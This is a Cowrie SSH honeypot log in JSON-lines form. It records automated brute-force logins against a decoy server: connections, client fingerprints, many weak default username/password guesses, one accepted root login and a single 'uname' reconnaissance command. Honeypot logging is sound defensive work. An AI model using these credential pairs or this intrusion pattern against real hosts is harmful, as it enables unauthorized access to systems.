{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34662,"dst_ip":"1.2.3.4","dst_port":22,"session":"65d138e93f45","protocol":"ssh","message":"New connection: 212.227.235.229:34662 (1.2.3.4:22) [session: 65d138e93f45]","sensor":"my-vps","timestamp":"2025-08-31T03:03:21.499926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:22.268208Z","src_ip":"212.227.235.229","session":"65d138e93f45"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:03:22.269133Z","src_ip":"212.227.235.229","session":"65d138e93f45"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44460,"dst_ip":"1.2.3.4","dst_port":22,"session":"64ad1d04060c","protocol":"ssh","message":"New connection: 41.226.27.251:44460 (1.2.3.4:22) [session: 64ad1d04060c]","sensor":"my-vps","timestamp":"2025-08-31T03:03:22.654217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:22.702146Z","src_ip":"41.226.27.251","session":"64ad1d04060c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:03:22.724107Z","src_ip":"41.226.27.251","session":"64ad1d04060c"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:03:22.899913Z","src_ip":"41.226.27.251","session":"64ad1d04060c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:03:23.019374Z","src_ip":"41.226.27.251","session":"64ad1d04060c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:03:23.020056Z","src_ip":"41.226.27.251","session":"64ad1d04060c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:23.070998Z","src_ip":"41.226.27.251","session":"64ad1d04060c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:23.071991Z","src_ip":"41.226.27.251","session":"64ad1d04060c"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin123","message":"login attempt [ftpuser/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:28.232784Z","src_ip":"212.227.235.229","session":"65d138e93f45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":29551,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ac1a68fa915","protocol":"ssh","message":"New connection: 212.227.235.229:29551 (1.2.3.4:22) [session: 9ac1a68fa915]","sensor":"my-vps","timestamp":"2025-08-31T03:03:28.631713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T03:03:28.632362Z","src_ip":"212.227.235.229","session":"9ac1a68fa915"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T03:03:28.765044Z","src_ip":"212.227.235.229","session":"9ac1a68fa915"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:28.915528Z","src_ip":"212.227.235.229","session":"780add2fcb22"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:29.371083Z","src_ip":"212.227.235.229","session":"9ac1a68fa915"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:30.092796Z","src_ip":"212.227.235.229","session":"65d138e93f45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53040,"dst_ip":"1.2.3.4","dst_port":22,"session":"5697102fec79","protocol":"ssh","message":"New connection: 212.227.125.160:53040 (1.2.3.4:22) [session: 5697102fec79]","sensor":"my-vps","timestamp":"2025-08-31T03:03:30.164418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:30.165188Z","src_ip":"212.227.125.160","session":"5697102fec79"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:03:30.329576Z","src_ip":"212.227.125.160","session":"5697102fec79"}
{"eventid":"cowrie.login.failed","username":"test","password":"test1234","message":"login attempt [test/test1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:30.510167Z","src_ip":"212.227.235.229","session":"9ac1a68fa915"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:30.826079Z","src_ip":"212.227.125.160","session":"5697102fec79"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:31.639968Z","src_ip":"212.227.235.229","session":"9ac1a68fa915"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:31.992120Z","src_ip":"212.227.125.160","session":"5697102fec79"}
{"eventid":"cowrie.login.failed","username":"test","password":"123","message":"login attempt [test/123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:32.770206Z","src_ip":"212.227.235.229","session":"9ac1a68fa915"}
{"eventid":"cowrie.login.failed","username":"test","password":"1234","message":"login attempt [test/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:33.900546Z","src_ip":"212.227.235.229","session":"9ac1a68fa915"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:35.031091Z","src_ip":"212.227.235.229","session":"9ac1a68fa915"}
{"eventid":"cowrie.session.closed","duration":"24.0","message":"Connection lost after 24.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:36.523179Z","src_ip":"212.227.235.229","session":"780add2fcb22"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50850,"dst_ip":"1.2.3.4","dst_port":22,"session":"d47205c59f2f","protocol":"ssh","message":"New connection: 212.227.125.160:50850 (1.2.3.4:22) [session: d47205c59f2f]","sensor":"my-vps","timestamp":"2025-08-31T03:03:39.000602Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52912,"dst_ip":"1.2.3.4","dst_port":22,"session":"c93df788b3b0","protocol":"ssh","message":"New connection: 212.227.235.229:52912 (1.2.3.4:22) [session: c93df788b3b0]","sensor":"my-vps","timestamp":"2025-08-31T03:03:40.337430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:40.338492Z","src_ip":"212.227.235.229","session":"c93df788b3b0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T03:03:40.657823Z","src_ip":"212.227.235.229","session":"c93df788b3b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52998,"dst_ip":"1.2.3.4","dst_port":22,"session":"20af513e652b","protocol":"ssh","message":"New connection: 212.227.125.160:52998 (1.2.3.4:22) [session: 20af513e652b]","sensor":"my-vps","timestamp":"2025-08-31T03:03:42.846828Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54942,"dst_ip":"1.2.3.4","dst_port":22,"session":"82b9a9cf643f","protocol":"ssh","message":"New connection: 41.226.27.251:54942 (1.2.3.4:22) [session: 82b9a9cf643f]","sensor":"my-vps","timestamp":"2025-08-31T03:03:43.036469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:43.037265Z","src_ip":"41.226.27.251","session":"82b9a9cf643f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:03:43.079686Z","src_ip":"41.226.27.251","session":"82b9a9cf643f"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:43.208971Z","src_ip":"41.226.27.251","session":"82b9a9cf643f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:43.308001Z","src_ip":"212.227.125.160","session":"20af513e652b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:03:43.350273Z","src_ip":"212.227.125.160","session":"20af513e652b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:44.423473Z","src_ip":"41.226.27.251","session":"82b9a9cf643f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin123","message":"login attempt [ftpuser/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:45.305470Z","src_ip":"212.227.125.160","session":"20af513e652b"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:46.681455Z","src_ip":"212.227.125.160","session":"20af513e652b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41290,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca1b87f65db7","protocol":"ssh","message":"New connection: 212.227.235.229:41290 (1.2.3.4:22) [session: ca1b87f65db7]","sensor":"my-vps","timestamp":"2025-08-31T03:03:47.247287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:47.247971Z","src_ip":"212.227.235.229","session":"ca1b87f65db7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:03:47.503530Z","src_ip":"212.227.235.229","session":"ca1b87f65db7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:47.766376Z","src_ip":"212.227.125.160","session":"d47205c59f2f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:03:47.881685Z","src_ip":"212.227.125.160","session":"d47205c59f2f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser123","message":"login attempt [ftpuser/ftpuser123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:48.266461Z","src_ip":"212.227.235.229","session":"ca1b87f65db7"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:48.339162Z","src_ip":"212.227.235.229","session":"c93df788b3b0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:49.522849Z","src_ip":"212.227.235.229","session":"ca1b87f65db7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41330,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff046397d4de","protocol":"ssh","message":"New connection: 212.227.235.229:41330 (1.2.3.4:22) [session: ff046397d4de]","sensor":"my-vps","timestamp":"2025-08-31T03:03:51.384307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:51.385899Z","src_ip":"212.227.235.229","session":"ff046397d4de"}
